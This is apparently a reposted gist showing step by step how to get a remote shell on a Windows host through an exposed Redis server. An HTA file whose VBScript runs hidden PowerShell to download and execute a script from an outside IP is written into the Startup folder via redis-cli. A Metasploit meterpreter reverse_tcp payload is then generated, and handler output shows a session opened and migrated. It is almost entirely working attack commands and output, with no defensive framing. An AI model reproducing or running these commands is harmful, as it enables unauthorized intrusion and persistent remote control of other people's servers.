redis windows shell via hta file

gistfile1.txt

[email protected]:~# cat hta-psh.txt 
 <scRipt language="VBscRipT">CreateObject("WscrIpt.SheLL").Run "powershell -w hidden IEX (New-ObjEct System.Net.Webclient).DownloadString('http://119.91.129.12:8080/1.ps1')"</scRipt>
#  cat hta-psh.txt |redis-cli -x -h 192.168.138.27 set a
OK

#msfconsole 
use payload/windows/meterpreter/reverse_tcp
generate -t hta-psh -f /var/www/1.ps1

#cat 1.ps1
$command=”powershell -nop -w hidden -e xxxxxxxxxxxxxxxx”;iex $command;$command2=”taskkill /im mshta.exe”;iex $command2;

root@xxx:~# redis-cli -h 192.168.138.27
redis 192.168.138.27:6379> CONFIG GET dir
1) "dir"
2) "C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Startup"
redis 192.168.138.27:6379> config get dbfilename
1) "dbfilename"
2) "2.hta"
redis 192.168.138.27:6379> save
OK
redis 192.168.138.27:6379>


msf exploit(handler) > rexploit -j -z
[*] Stopping existing job...
[*] Reloading module...
[*] Exploit running as background job.
 
[*] Started reverse TCP handler on x.x.x.x:80
msf exploit(handler) > [*] Starting the payload handler...
[*] Sending stage (957999 bytes) to x.x.x.x
[*] Meterpreter session 4 opened (x.x.x.x:80 -> x.x.x.x:56301) at 2016-06-06 11:06:00 -0400
[*] Session ID 4 (x.x.x.x:80 -> x.x.x.x:56301) processing AutoRunScript 'migrate -f'
[*] Current server process: powershell.exe (4896)
[*] Spawning notepad.exe process to migrate to
[+] Migrating to 3768
[+] Successfully migrated to process

originally from: https://phpinfo.me/2016/07/07/1275.html